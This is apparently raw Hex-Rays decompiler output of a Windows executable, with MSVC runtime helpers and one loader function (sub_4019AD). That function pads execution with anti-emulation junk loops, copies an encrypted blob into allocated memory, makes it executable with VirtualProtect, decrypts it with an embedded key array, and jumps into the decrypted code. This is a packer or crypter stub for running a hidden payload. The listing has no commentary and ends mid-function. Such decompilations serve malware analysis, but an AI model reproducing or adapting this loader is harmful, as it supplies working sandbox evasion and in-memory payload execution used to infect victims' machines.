/* This file was generated by the Hex-Rays decompiler version 8.3.0.230608.
   Copyright (c) 2007-2021 Hex-Rays <info@hex-rays.com>

   Detected compiler: Visual C++
*/

#include <windows.h>
#include <defs.h>


//-------------------------------------------------------------------------
// Function declarations

#define __thiscall __cdecl // Test compile in C mode

int sub_40100C();
int sub_401018();
void *__stdcall sub_401070(size_t Size, int a2);
void *__stdcall sub_40109A(unsigned int a1, int a2);
// _DWORD __thiscall std::string::string(_DWORD, void *Src); weak
_DWORD *__thiscall sub_401170(_DWORD *this);
_DWORD *__thiscall sub_401179(_DWORD *this);
_DWORD *__thiscall sub_401182(_DWORD *this);
_DWORD *__thiscall sub_40118B(_DWORD *this);
void __thiscall sub_4011CA(_DWORD *this);
_DWORD *__thiscall sub_401207(_DWORD *Block, char a2);
int __thiscall sub_401227(const void **this, int a2, int Size);
int __thiscall sub_401338(_DWORD *this, unsigned int a2, int a3);
BOOL __thiscall sub_401483(int *this, size_t Size, char a3);
BOOL __thiscall sub_4014E6(int *this, unsigned int a2, char a3);
// int __thiscall std::string::_Tidy(void *, char, size_t Size); idb
// int __thiscall std::wstring::_Tidy(void *, char, int); idb
void __noreturn sub_401665(); // weak
void __noreturn sub_401670(); // weak
int *__thiscall sub_4016AE(int *this, int *a2, unsigned int a3, size_t Size);
int *__thiscall sub_4017DA(int *this, int *a2, unsigned int a3, unsigned int a4);
int __thiscall sub_401925(_DWORD *this);
void *__cdecl sub_40193D(void *a1, void *Src, int a3);
int sub_4019AD();
// _DWORD __stdcall std::string::erase(_DWORD); weak
// _DWORD __stdcall std::string::erase(_DWORD, _DWORD); weak
// _DWORD __stdcall std::wstring::erase(_DWORD); weak
// _DWORD __stdcall std::wstring::erase(_DWORD, _DWORD); weak
void ***sub_401D78();
int __cdecl sub_401D9B(_WORD *a1);
int sub_401DC6();
int __stdcall sub_401DD2(int a1);
int sub_401DDA();
int sub_401DDE();
int __stdcall sub_401DE4(int a1, int a2);
int __stdcall sub_401E0A(int a1, int a2);
int __stdcall sub_401E34(int a1, int a2);
const char *sub_401E90();
const char *sub_401E96();
const char *sub_401E9C();
int sub_401EA2();
int __thiscall sub_4031FF(_DWORD *this);
int __stdcall sub_403203(int *a1, SIZE_T *a2);
unsigned int __stdcall sub_403552(unsigned int *a1, int *a2);
unsigned int __stdcall sub_4037A1(int a1, unsigned int a2, int *a3);
int __thiscall sub_403883(void *this);
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd);
void *__thiscall sub_403B31(void *this);
std::exception *__thiscall sub_403B34(std::exception *this, struct exception *a2);
std::exception *__thiscall sub_403B75(std::exception *this, struct exception *a2);
std::exception *__thiscall sub_403BA4(std::exception *this, struct exception *a2);
std::exception *__thiscall sub_403BE1(std::exception *this, struct exception *a2);
std::exception *__thiscall sub_403C1E(std::exception *this, struct exception *a2);
std::exception *__thiscall sub_403C55(std::exception *this, struct exception *a2);
std::exception *__thiscall sub_403C92(std::exception *this, struct exception *a2);
std::exception *__thiscall sub_403CCF(std::exception *this, struct exception *a2);
std::exception *__thiscall sub_403D23(std::exception *this, struct exception *a2);
void __thiscall sub_403D5A(std::exception *this);
std::exception *__thiscall sub_403D6A(std::exception *Block, char a2);
std::exception *__thiscall sub_403D8F(std::exception *Block, char a2);
// void __fastcall __noreturn unknown_libname_12(_DWORD); weak
// void __cdecl __noreturn std::_Xlength_error(const char *); idb
// void __cdecl __noreturn std::_Xout_of_range(const char *); idb
void ***sub_403FC9();
const char *sub_403FCF();
int __cdecl sub_403FD5(int a1);
int __cdecl sub_403FFF(int a1);
// void *__cdecl operator new(size_t Size); idb
void __cdecl j__free(void *Block);
// int __cdecl atexit(void (__cdecl *)());
// void __cdecl __noreturn exit(int Code);
// int __cdecl unknown_libname_15(FILE *Stream, int, int); idb
int __cdecl sub_405000(double, double);
int __thiscall sub_40500A(void *this);
// void __stdcall __noreturn _CxxThrowException(void *pExceptionObject, _ThrowInfo *pThrowInfo);
// void *__cdecl memmove_0(void *, const void *Src, size_t Size);
_DWORD *__thiscall sub_405D74(_DWORD *this, int a2);
int __thiscall sub_405D7F(_DWORD *this);
void *__thiscall sub_405D8D(void *this, int a2);
_DWORD *__thiscall sub_405DCF(_DWORD *Block, char a2);
char *__thiscall sub_405E3A(char *this);
std::exception *__thiscall sub_406198(std::exception *this, struct exception *a2);
std::exception *__thiscall sub_4061B3(std::exception *this, char *a2);
// _DWORD __thiscall std::exception::exception(std::exception *__hidden this, const char *const *); idb
// _DWORD __thiscall std::exception::exception(std::exception *__hidden this, const struct exception *); idb
void __thiscall sub_406243(std::exception *this);
std::exception *__thiscall sub_406281(std::exception *Block, char a2);
// void __thiscall std::exception::_Tidy(std::exception *__hidden this); idb
void __thiscall sub_40630D(void *this);
void *__cdecl sub_406661(void *a1);
void *__cdecl sub_4067CE(void *a1);
void *__cdecl sub_406EAC(void *a1);
void sub_406F5F();
void __cdecl sub_406F7F(); // idb
// _DWORD __cdecl _lock(_DWORD); weak
// _DWORD __cdecl _unlock(_DWORD); weak
// int __crtIsPackagedApp(void); weak
// int __cdecl __crtSetUnhandledExceptionFilter(LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter); idb
void __cdecl sub_40774B(DWORD dwMilliseconds);
PVOID sub_407CC9();
void *__cdecl sub_4081EC(void *a1);
void **sub_408C4B();
// int __fastcall _cintrindisp2(_DWORD, _DWORD); weak
// int __cdecl _ctrandisp2(double, double); idb
DWORD sub_40C52E();
std::exception *__thiscall sub_40C957(std::exception *this, struct exception *a2);
void __thiscall sub_40C98E(std::exception *this);
std::exception *__thiscall sub_40C999(std::exception *Block, char a2);
int sub_40D6C9();
// _DWORD __cdecl unknown_libname_26(_DWORD); weak
// int __stdcall __CxxUnhandledExceptionFilter(struct _EXCEPTION_POINTERS *ExceptionInfo); idb
int sub_40EA6F();
HANDLE sub_40EC2A();
int __cdecl sub_40EF6A(int a1);
// void __cdecl __noreturn __report_gsfailure();
void sub_40FD32();
int __cdecl sub_40FF6F(const WCHAR *a1, int a2, int a3);
int sub_410976();
// _DWORD __cdecl flsall(_DWORD); weak
int sub_411C2C();
// _DWORD __stdcall unknown_libname_30(char); weak
_DWORD *__thiscall sub_41203C(_DWORD *this);
DName *__cdecl sub_412420(DName *a1, char a2, int a3);
// int __stdcall DName::operator+(DName *, int); idb
char __thiscall sub_41526D(_BYTE *this);
int __thiscall sub_417777(_DWORD *this);
int sub_41777B();
int sub_41820F();
void *sub_419A13();
int sub_41AF56();
void *sub_41AF5C();
int __cdecl sub_41CA96(unsigned __int16 *a1, _DWORD *a2);
int __cdecl sub_41D008(unsigned __int16 *a1, _DWORD *a2);
wint_t __cdecl sub_42066C(wchar_t Character);
// wint_t __cdecl _putwch_nolock(wchar_t Character);
HANDLE sub_4255FE();
void sub_42744D();
void __cdecl sub_427458(); // idb
void __cdecl sub_427463(); // idb
void sub_42746E();
void sub_427479();
void sub_427484();
void sub_42748F();
void sub_42749A();
void sub_4274A5();

//-------------------------------------------------------------------------
// Data declarations

// extern FARPROC (__stdcall *GetProcAddress)(HMODULE hModule, LPCSTR lpProcName);
// extern HLOCAL (__stdcall *LocalAlloc)(UINT uFlags, SIZE_T uBytes);
// extern BOOL (__stdcall *VirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
// extern DWORD (__stdcall *GetLongPathNameA)(LPCSTR lpszShortPath, LPSTR lpszLongPath, DWORD cchBuffer);
// extern BOOL (__stdcall *GetFileInformationByHandle)(HANDLE hFile, LPBY_HANDLE_FILE_INFORMATION lpFileInformation);
// extern BOOL (__stdcall *IsProcessorFeaturePresent)(DWORD ProcessorFeature);
// extern DWORD (__stdcall *GetTickCount)();
// extern int (__stdcall *lstrcmpiA)(LPCSTR lpString1, LPCSTR lpString2);
// extern LPWSTR (__stdcall *lstrcpyW)(LPWSTR lpString1, LPCWSTR lpString2);
// extern HMODULE (__stdcall *GetModuleHandleW)(LPCWSTR lpModuleName);
// extern DWORD (__stdcall *ExpandEnvironmentStringsW)(LPCWSTR lpSrc, LPWSTR lpDst, DWORD nSize);
// extern BOOL (__stdcall *WritePrivateProfileStructW)(LPCWSTR lpszSection, LPCWSTR lpszKey, LPVOID lpStruct, UINT uSizeStruct, LPCWSTR szFile);
// extern BOOL (__stdcall *MoveFileA)(LPCSTR lpExistingFileName, LPCSTR lpNewFileName);
// extern BOOL (__stdcall *VerifyVersionInfoA)(LPOSVERSIONINFOEXA lpVersionInformation, DWORD dwTypeMask, DWORDLONG dwlConditionMask);
// extern BOOL (__stdcall *FillConsoleOutputCharacterA)(HANDLE hConsoleOutput, CHAR cCharacter, DWORD nLength, COORD dwWriteCoord, LPDWORD lpNumberOfCharsWritten);
// extern PVOID (__stdcall *EncodePointer)(PVOID Ptr);
// extern PVOID (__stdcall *DecodePointer)(PVOID Ptr);
// extern DWORD (__stdcall *GetLastError)();
// extern BOOL (__stdcall *IsDebuggerPresent)();
// extern void (__stdcall *Sleep)(DWORD dwMilliseconds);
// extern HMODULE (__stdcall *LoadLibraryExW)(LPCWSTR lpLibFileName, HANDLE hFile, DWORD dwFlags);
// extern void (__stdcall *OutputDebugStringW)(LPCWSTR lpOutputString);
// extern BOOL (__stdcall *CloseHandle)(HANDLE hObject);
const CHAR ProcName[2] = { '\0', '\0' }; // idb
int (__thiscall *off_44A848)(void *Block, char) = &sub_401207; // weak
void *std::_Generic_error_category::`vftable' = &sub_401207; // weak
void *std::_Iostream_error_category::`vftable' = &sub_401207; // weak
void *std::_System_error_category::`vftable' = &sub_401207; // weak
int (__thiscall *off_44ADF4)(void *Block, char) = &sub_403D6A; // weak
void *std::logic_error::`vftable' = &sub_403D8F; // weak
void *std::invalid_argument::`vftable' = &sub_403D8F; // weak
void *std::length_error::`vftable' = &sub_403D8F; // weak
void *std::out_of_range::`vftable' = &sub_403D8F; // weak
void *std::runtime_error::`vftable' = &sub_403D8F; // weak
void *std::overflow_error::`vftable' = &sub_403D8F; // weak
void *std::bad_function_call::`vftable' = &sub_403D8F; // weak
void *std::regex_error::`vftable' = &sub_403D8F; // weak
_UNKNOWN unk_44B3B8; // weak
_UNKNOWN unk_44B610; // weak
int (__thiscall *off_44C178)(void *Block, char) = &sub_405DCF; // weak
void *std::exception::`vftable' = &sub_406281; // weak
void *std::bad_typeid::`vftable' = &sub_406281; // weak
_UNKNOWN unk_44CF80; // weak
void *std::bad_exception::`vftable' = &sub_40C999; // weak
void *DNameNode::`vftable' = &_purecall; // weak
void (*dword_452154[2])(void) = { NULL, NULL }; // weak
void (*dword_45215C)(void) = NULL; // weak
int dword_454000[673] =
{
  499239452,
  -1679505876,
  551153131,
  771971782,
  933851780,
  -832212207,
  -48903183,
  20693,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  542456
}; // weak
int dword_454A84 = 3775138; // weak
int dword_454A90 = -447818; // weak
void **off_454A98[3] =
{
  &std::_Generic_error_category::`vftable',
  &std::_Iostream_error_category::`vftable',
  &std::_System_error_category::`vftable'
}; // weak
void **off_454A9C[2] =
{
  &std::_Iostream_error_category::`vftable',
  &std::_System_error_category::`vftable'
}; // weak
void **off_454AA0 = &std::_System_error_category::`vftable'; // weak
void *off_4552B8 = &unk_472160; // weak
DWORD dwTlsIndex = 4294967295u; // idb
int dword_4556C0 = -1153374642; // weak
void *off_455990 = &unk_450482; // weak
int dword_455AA0 = 1024; // weak
int dword_455AA4 = -1023; // weak
int dword_455AA8 = 53; // weak
int dword_455AAC = 11; // weak
int dword_455AB0 = 64; // weak
int dword_455AB4 = 1023; // weak
int dword_455AB8 = 128; // weak
int dword_455ABC = -127; // weak
int dword_455AC0 = 24; // weak
int dword_455AC4 = 8; // weak
int dword_455AC8 = 32; // weak
int dword_455ACC = 127; // weak
HANDLE hObject = (HANDLE)0xFFFFFFFE; // idb
WCHAR String1; // idb
int dword_468EFC; // weak
int dword_468F00; // weak
SIZE_T dwSize; // idb
LPVOID lpAddress; // idb
int dword_468F0C; // weak
int dword_468F10; // weak
__int16 word_468F18; // weak
CHAR dword_469218[]; // idb
char byte_46AEE8; // weak
__int16 word_46D5E0; // weak
int dword_46F1A8; // weak
PVOID dword_47137C; // idb
PVOID dword_471380; // idb
PVOID dword_471390; // idb
int dword_4714E8; // weak
PVOID dword_471B24; // idb
PVOID dword_471B30; // idb
HANDLE hHeap; // idb
PVOID dword_4720A8; // idb
PVOID dword_4720AC; // idb
PVOID dword_4720B0; // idb
PVOID dword_4720B4; // idb
PVOID dword_4720B8; // idb
int dword_47212C; // weak
_UNKNOWN unk_47213C; // weak
int dword_472140; // weak
int dword_472144; // weak


//----- (0040100C) --------------------------------------------------------
int sub_40100C()
{
  return atexit(sub_427458);
}

//----- (00401018) --------------------------------------------------------
int sub_401018()
{
  return atexit(sub_427463);
}

//----- (00401070) --------------------------------------------------------
void *__stdcall sub_401070(size_t Size, int a2)
{
  void *v2; // ecx

  v2 = 0;
  if ( Size )
  {
    v2 = operator new(Size);
    if ( !v2 )
      unknown_libname_12();
  }
  return v2;
}
// 403E6E: using guessed type void __noreturn unknown_libname_12(void);

//----- (0040109A) --------------------------------------------------------
void *__stdcall sub_40109A(unsigned int a1, int a2)
{
  void *v2; // ecx

  v2 = 0;
  if ( a1 )
  {
    if ( a1 > 0x7FFFFFFF || (v2 = operator new(2 * a1)) == 0 )
      unknown_libname_12(v2);
  }
  return v2;
}
// 403E6E: using guessed type void __fastcall __noreturn unknown_libname_12(_DWORD);

//----- (00401170) --------------------------------------------------------
_DWORD *__thiscall sub_401170(_DWORD *this)
{
  *this = &std::_Generic_error_category::`vftable';
  return this;
}
// 44A864: using guessed type void *std::_Generic_error_category::`vftable';

//----- (00401179) --------------------------------------------------------
_DWORD *__thiscall sub_401179(_DWORD *this)
{
  *this = &std::_Iostream_error_category::`vftable';
  return this;
}
// 44A898: using guessed type void *std::_Iostream_error_category::`vftable';

//----- (00401182) --------------------------------------------------------
_DWORD *__thiscall sub_401182(_DWORD *this)
{
  *this = &std::_System_error_category::`vftable';
  return this;
}
// 44A8D8: using guessed type void *std::_System_error_category::`vftable';

//----- (0040118B) --------------------------------------------------------
_DWORD *__thiscall sub_40118B(_DWORD *this)
{
  *this = &off_44A848;
  return this;
}
// 44A848: using guessed type int (__thiscall *off_44A848)(void *Block, char);

//----- (004011CA) --------------------------------------------------------
void __thiscall sub_4011CA(_DWORD *this)
{
  *this = &off_44A848;
}
// 44A848: using guessed type int (__thiscall *off_44A848)(void *Block, char);

//----- (00401207) --------------------------------------------------------
_DWORD *__thiscall sub_401207(_DWORD *Block, char a2)
{
  *Block = &off_44A848;
  if ( (a2 & 1) != 0 )
    j__free(Block);
  return Block;
}
// 44A848: using guessed type int (__thiscall *off_44A848)(void *Block, char);

//----- (00401227) --------------------------------------------------------
int __thiscall sub_401227(const void **this, int a2, int Size)
{
  const void **v3; // esi
  unsigned int v4; // edi
  unsigned int v5; // ebx
  unsigned int v6; // ecx
  void *v7; // ecx
  const void **v8; // edx
  int result; // eax
  _DWORD v10[5]; // [esp+0h] [ebp-28h] BYREF
  void *v11; // [esp+14h] [ebp-14h]
  _DWORD *v12; // [esp+18h] [ebp-10h]
  int v13; // [esp+24h] [ebp-4h]

  v12 = v10;
  v3 = this;
  v10[4] = this;
  v4 = a2 | 0xF;
  if ( (a2 | 0xF) == -1 )
  {
    v4 = a2;
  }
  else
  {
    v5 = (unsigned int)this[5];
    v6 = v5 >> 1;
    v10[3] = 3;
    if ( v5 >> 1 > v4 / 3 )
    {
      if ( v5 > -2 - v6 )
        v4 = -2;
      else
        v4 = v6 + v5;
    }
  }
  v13 = 0;
  v7 = sub_401070(v4 + 1, 0);
  v11 = v7;
  v13 = -1;
  if ( Size )
  {
    if ( (unsigned int)v3[5] < 0x10 )
      v8 = v3;
    else
      v8 = (const void **)*v3;
    memmove_0(v7, v8, Size);
  }
  std::string::_Tidy(v3, 1, 0);
  if ( v3 )
    *v3 = v11;
  v3[5] = (const void *)v4;
  result = Size;
  v3[4] = (const void *)Size;
  if ( v4 >= 0x10 )
    v3 = (const void **)*v3;
  *((_BYTE *)v3 + Size) = 0;
  return result;
}
// 4012DD: conditional instruction was optimized away because %Size.4!=0

//----- (00401338) --------------------------------------------------------
int __thiscall sub_401338(_DWORD *this, unsigned int a2, int a3)
{
  _DWORD *v3; // esi
  unsigned int v4; // edi
  unsigned int v5; // ebx
  unsigned int v6; // ecx
  void *v7; // eax
  _DWORD *v8; // ecx
  int result; // eax
  _DWORD v10[5]; // [esp+0h] [ebp-28h] BYREF
  void *v11; // [esp+14h] [ebp-14h]
  _DWORD *v12; // [esp+18h] [ebp-10h]
  int v13; // [esp+24h] [ebp-4h]

  v12 = v10;
  v3 = this;
  v10[4] = this;
  v4 = a2 | 7;
  if ( (a2 | 7) <= 0x7FFFFFFE )
  {
    v5 = this[5];
    v6 = v5 >> 1;
    v10[3] = 3;
    if ( v5 >> 1 > v4 / 3 )
    {
      v4 = 2147483646;
      if ( v5 <= 2147483646 - v6 )
        v4 = v6 + v5;
    }
  }
  else
  {
    v4 = a2;
  }
  v13 = 0;
  v7 = sub_40109A(v4 + 1, 0);
  v11 = v7;
  v13 = -1;
  if ( a3 )
  {
    if ( v3[5] < 8u )
      v8 = v3;
    else
      v8 = (_DWORD *)*v3;
    sub_40193D(v7, v8, a3);
  }
  std::wstring::_Tidy(v3, 1, 0);
  if ( v3 )
    *v3 = v11;
  v3[5] = v4;
  v3[4] = a3;
  if ( v4 >= 8 )
    v3 = (_DWORD *)*v3;
  result = 0;
  *((_WORD *)v3 + a3) = 0;
  return result;
}

//----- (00401483) --------------------------------------------------------
BOOL __thiscall sub_401483(int *this, size_t Size, char a3)
{
  size_t v3; // eax

  if ( Size == -1 )
    std::_Xlength_error("string too long");
  if ( this[5] >= Size )
  {
    if ( a3 && Size < 0x10 )
    {
      v3 = this[4];
      if ( Size < v3 )
        v3 = Size;
      std::string::_Tidy(this, 1, v3);
    }
    else if ( !Size )
    {
      this[4] = 0;
      if ( (unsigned int)this[5] >= 0x10 )
        this = (int *)*this;
      *(_BYTE *)this = 0;
    }
  }
  else
  {
    sub_401227((const void **)this, Size, this[4]);
  }
  return Size != 0;
}

//----- (004014E6) --------------------------------------------------------
BOOL __thiscall sub_4014E6(int *this, unsigned int a2, char a3)
{
  unsigned int v3; // eax

  if ( a2 > 0x7FFFFFFE )
    std::_Xlength_error("string too long");
  if ( this[5] >= a2 )
  {
    if ( a3 && a2 < 8 )
    {
      v3 = this[4];
      if ( a2 < v3 )
        v3 = a2;
      std::wstring::_Tidy(this, 1, v3);
    }
    else if ( !a2 )
    {
      this[4] = 0;
      if ( (unsigned int)this[5] >= 8 )
        this = (int *)*this;
      *(_WORD *)this = 0;
    }
  }
  else
  {
    sub_401338(this, a2, this[4]);
  }
  return a2 != 0;
}

//----- (00401665) --------------------------------------------------------
void __noreturn sub_401665()
{
  std::_Xlength_error("string too long");
}
// 401665: using guessed type void __noreturn sub_401665();

//----- (00401670) --------------------------------------------------------
void __noreturn sub_401670()
{
  std::_Xout_of_range("invalid string position");
}
// 401670: using guessed type void __noreturn sub_401670();

//----- (004016AE) --------------------------------------------------------
int *__thiscall sub_4016AE(int *this, int *a2, unsigned int a3, size_t Size)
{
  int *v4; // ebx
  unsigned int v6; // edi
  size_t v7; // edi
  int *v8; // ecx
  bool v9; // cf
  int *v10; // eax

  v4 = a2;
  v6 = a2[4];
  if ( v6 < a3 )
    std::_Xout_of_range("invalid string position");
  v7 = v6 - a3;
  if ( Size < v7 )
    v7 = Size;
  if ( this == a2 )
  {
    std::string::erase(v7 + a3);
    std::string::erase(0, a3);
  }
  else if ( sub_401483(this, v7, 0) )
  {
    if ( (unsigned int)a2[5] >= 0x10 )
      v4 = (int *)*a2;
    if ( (unsigned int)this[5] < 0x10 )
      v8 = this;
    else
      v8 = (int *)*this;
    if ( v7 )
      memmove_0(v8, (char *)v4 + a3, v7);
    v9 = (unsigned int)this[5] < 0x10;
    this[4] = v7;
    if ( v9 )
      v10 = this;
    else
      v10 = (int *)*this;
    *((_BYTE *)v10 + v7) = 0;
  }
  return this;
}
// 401C10: using guessed type _DWORD __stdcall std::string::erase(_DWORD);
// 401C3F: using guessed type _DWORD __stdcall std::string::erase(_DWORD, _DWORD);

//----- (004017DA) --------------------------------------------------------
int *__thiscall sub_4017DA(int *this, int *a2, unsigned int a3, unsigned int a4)
{
  int *v4; // ebx
  unsigned int v6; // edi
  unsigned int v7; // edi
  int *v8; // ecx
  int *v9; // eax

  v4 = a2;
  v6 = a2[4];
  if ( v6 < a3 )
    std::_Xout_of_range("invalid string position");
  v7 = v6 - a3;
  if ( a4 < v7 )
    v7 = a4;
  if ( this == a2 )
  {
    std::wstring::erase(v7 + a3);
    std::wstring::erase(0, a3);
  }
  else if ( sub_4014E6(this, v7, 0) )
  {
    if ( (unsigned int)a2[5] >= 8 )
      v4 = (int *)*a2;
    if ( (unsigned int)this[5] < 8 )
      v8 = this;
    else
      v8 = (int *)*this;
    sub_40193D(v8, (char *)v4 + 2 * a3, v7);
    this[4] = v7;
    if ( (unsigned int)this[5] < 8 )
      v9 = this;
    else
      v9 = (int *)*this;
    *((_WORD *)v9 + v7) = 0;
  }
  return this;
}
// 401CC1: using guessed type _DWORD __stdcall std::wstring::erase(_DWORD);
// 401CF4: using guessed type _DWORD __stdcall std::wstring::erase(_DWORD, _DWORD);

//----- (00401925) --------------------------------------------------------
int __thiscall sub_401925(_DWORD *this)
{
  return this[1];
}

//----- (0040193D) --------------------------------------------------------
void *__cdecl sub_40193D(void *a1, void *Src, int a3)
{
  if ( a3 )
    return memmove_0(a1, Src, 2 * a3);
  else
    return a1;
}

//----- (004019AD) --------------------------------------------------------
int sub_4019AD()
{
  int i; // esi
  int j; // ecx
  SIZE_T k; // edx
  int m; // esi
  struct _BY_HANDLE_FILE_INFORMATION FileInformation; // [esp+8h] [ebp-44h] BYREF
  DWORD flOldProtect; // [esp+3Ch] [ebp-10h] BYREF
  DWORD NumberOfCharsWritten; // [esp+40h] [ebp-Ch] BYREF
  COORD dwWriteCoord; // [esp+44h] [ebp-8h]
  DWORD flNewProtect; // [esp+48h] [ebp-4h]

  if ( dwSize == 393582 )
  {
    lstrcmpiA(0, 0);
    GetFileInformationByHandle(0, &FileInformation);
    exit(1);
  }
  for ( i = 0; i < 807178237; ++i )
  {
    GetTickCount();
    IsProcessorFeaturePresent(0);
    if ( i > 1809073 && FileInformation.nNumberOfLinks != 1718787859 )
      break;
  }
  sub_401EA2();
  dwWriteCoord = (COORD)LocalAlloc(0, dwSize);
  for ( j = 0; j < 8038247; ++j )
  {
    if ( j == 4161773 )
    {
      lpAddress = (LPVOID)dwWriteCoord;
      dword_468F0C = dword_454A84;
    }
  }
  for ( k = 0; k < dwSize; ++k )
    *((_BYTE *)lpAddress + k) = *(_BYTE *)(dword_468F0C + k + 586102);
  sub_403203((int *)&lpAddress, &dwSize);
  flNewProtect = 64;
  strcpy((char *)&dword_46F1A8, "kernel32.dll");
  for ( m = 0; m < 414547; ++m )
  {
    if ( m == 149369 )
      dword_468F10 = (int)GetModuleHandleW(L"kernel32.dll");
    if ( dwSize == 2665 )
    {
      dwWriteCoord = 0;
      FillConsoleOutputCharacterA(0, 0, 0, 0, &NumberOfCharsWritten);
    }
  }
  strcpy((char *)&word_46D5E0, "VirtualProtect");
  VirtualProtect(lpAddress, dwSize, flNewProtect, &flOldProtect);
  sub_4037A1((int)lpAddress, dwSize, dword_454000);
  dwWriteCoord = (COORD)((char *)lpAddress + 4749);
  lpAddress = (char *)lpAddress + 4749;
  return ((int (*)(void))lpAddress)();
}
// 468F08: invalid function type 'LPVOID lpAddress' has been ignored
// 4019EC: conditional instruction was optimized away because edx.4 is in (==0|==FFFFFFFF)
// 454000: using guessed type int dword_454000[673];
// 454A84: using guessed type int dword_454A84;
// 468F0C: using guessed type int dword_468F0C;
// 468F10: using guessed type int dword_468F10;
// 46D5E0: using guessed type __int16 word_46D5E0;
// 46D5E2: using guessed type int dword_46D5E2;
// 46F1A8: using guessed type int dword_46F1A8;

//----- (00401D78) --------------------------------------------------------
void ***sub_401D78()
{
  return off_454A98;
}
// 454A98: using guessed type void **off_454A98[3];

//----- (00401D9B) --------------------------------------------------------
int __cdecl sub_401D9B(_WORD *a1)
{
  _WORD *v1; // edx
  int v2; // ecx

  v1 = a1;
  v2 = 0;
  if ( *a1 )
  {
    while ( *v1++ )
